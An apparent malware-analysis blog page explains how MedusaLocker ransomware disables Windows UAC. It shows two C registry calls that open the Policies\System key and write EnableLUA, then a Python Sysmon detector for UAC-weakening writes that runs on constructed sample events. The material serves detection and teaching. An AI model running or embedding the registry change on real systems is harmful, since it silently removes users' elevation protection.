MalwareAnalysisSeries

This repository contains the analysis reports, technical details and tools created to help with malware analysis. It also contains TTPs extracted from the analysed samples, each with code and matching detection rules.


Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham

MedusaLocker: Disable UAC

(Image: MedusaLocker)

This TTP, extracted from the MedusaLocker ransomware, disables UAC on the victim system by modifying registry values. It requires administrator privileges and a restart to disable UAC completely. Once the test case has executed successfully, every process opens as admin by default.

Open the registry key (`hKey` is the `HKEY` handle that receives the opened key):

```c
// Open the UAC policy key with full access; requires an elevated process.
RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_ALL_ACCESS, &hKey);
```

Change the value (`value` is the `DWORD` written to `EnableLUA`):

```c
// Overwrite EnableLUA; the new setting takes effect after a restart.
RegSetValueEx(hKey, L"EnableLUA", 0, REG_DWORD, (LPBYTE)&value, sizeof(DWORD));
```

Find the complete code here: Shaddy43/MalwareAnalysisSeries
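The write to `EnableLUA` above is visible to Sysmon as a RegistryEvent (Event ID 13, value set) on the `Policies\System` key. The following detection logic is an added example, not code from this repository: it parses constructed Sysmon-style records (the `key=value|...` line format and all paths, times and process names are made up for the example), and flags DWORD writes that weaken UAC. It goes slightly beyond the page by also flagging `ConsentPromptBehaviorAdmin` set to 0, which makes elevation silent for administrators.

```python
"""Flag UAC-weakening registry writes in Sysmon Event ID 13 (value set) records.

Added example for the MedusaLocker "Disable UAC" TTP; the sample events below
are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

# Sysmon renders HKEY_LOCAL_MACHINE targets with the HKLM prefix.
UAC_POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Value names under the policy key, mapped to the DWORD that weakens protection.
WEAKENING_VALUES = {
    "EnableLUA": 0,                   # 0 disables UAC entirely (the MedusaLocker TTP)
    "ConsentPromptBehaviorAdmin": 0,  # 0 elevates administrators without any prompt
}

# Sysmon formats DWORD data in the Details field as "DWORD (0x00000000)".
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")


@dataclass
class RegistryEvent:
    utc_time: str
    image: str
    target_object: str
    details: str


def parse_sysmon_line(line):
    """Parse one constructed 'key=value|key=value' Sysmon record; None if not Event 13."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    if fields.get("EventID") != "13":
        return None
    return RegistryEvent(fields["UtcTime"], fields["Image"],
                         fields["TargetObject"], fields["Details"])


def dword_value(details):
    """Extract the integer from a Sysmon DWORD Details string, or None."""
    match = DWORD_RE.search(details)
    return int(match.group(1), 16) if match else None


def is_uac_weakening(event):
    """True when the event writes a weakening value to a watched UAC policy value."""
    key, _, value_name = event.target_object.rpartition("\\")
    if key.lower() != UAC_POLICY_KEY.lower():
        return False
    if value_name not in WEAKENING_VALUES:
        return False
    return dword_value(event.details) == WEAKENING_VALUES[value_name]


def find_uac_tampering(lines):
    """Return the RegistryEvents that should raise an alert."""
    alerts = []
    for line in lines:
        event = parse_sysmon_line(line)
        if event is not None and is_uac_weakening(event):
            alerts.append(event)
    return alerts


# Constructed sample records: one benign write, one unrelated key, two weakening writes.
SAMPLE_EVENTS = [
    "EventID=13|UtcTime=2023-04-01 10:00:01.000|Image=C:\\Windows\\regedit.exe"
    "|TargetObject=" + UAC_POLICY_KEY + "\\EnableLUA|Details=DWORD (0x00000001)",
    "EventID=13|UtcTime=2023-04-01 10:00:05.000|Image=C:\\Windows\\explorer.exe"
    "|TargetObject=HKLM\\SOFTWARE\\Example\\Setting|Details=DWORD (0x00000000)",
    "EventID=13|UtcTime=2023-04-01 10:02:17.000|Image=C:\\Users\\victim\\AppData\\Local\\Temp\\svhost.exe"
    "|TargetObject=" + UAC_POLICY_KEY + "\\EnableLUA|Details=DWORD (0x00000000)",
    "EventID=13|UtcTime=2023-04-01 10:02:18.000|Image=C:\\Users\\victim\\AppData\\Local\\Temp\\svhost.exe"
    "|TargetObject=" + UAC_POLICY_KEY + "\\ConsentPromptBehaviorAdmin|Details=DWORD (0x00000000)",
    "EventID=1|UtcTime=2023-04-01 10:02:19.000|Image=C:\\Windows\\System32\\cmd.exe"
    "|TargetObject=|Details=",
]

if __name__ == "__main__":
    for alert in find_uac_tampering(SAMPLE_EVENTS):
        print(f"{alert.utc_time} UAC weakened by {alert.image}: {alert.target_object} = {alert.details}")
```

Sysmon only emits Event 13 for keys its configuration includes, so the `Policies\System` key must be in an `include` rule for this to fire. The same write is made legitimately by Group Policy or an administrator in `regedit.exe`, which is why the alert carries the `Image`: an unsigned binary in a user-writable temp path writing `EnableLUA` to 0 is the pattern that matches the ransomware behaviour described above.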

Disclaimer

For educational purposes only!!!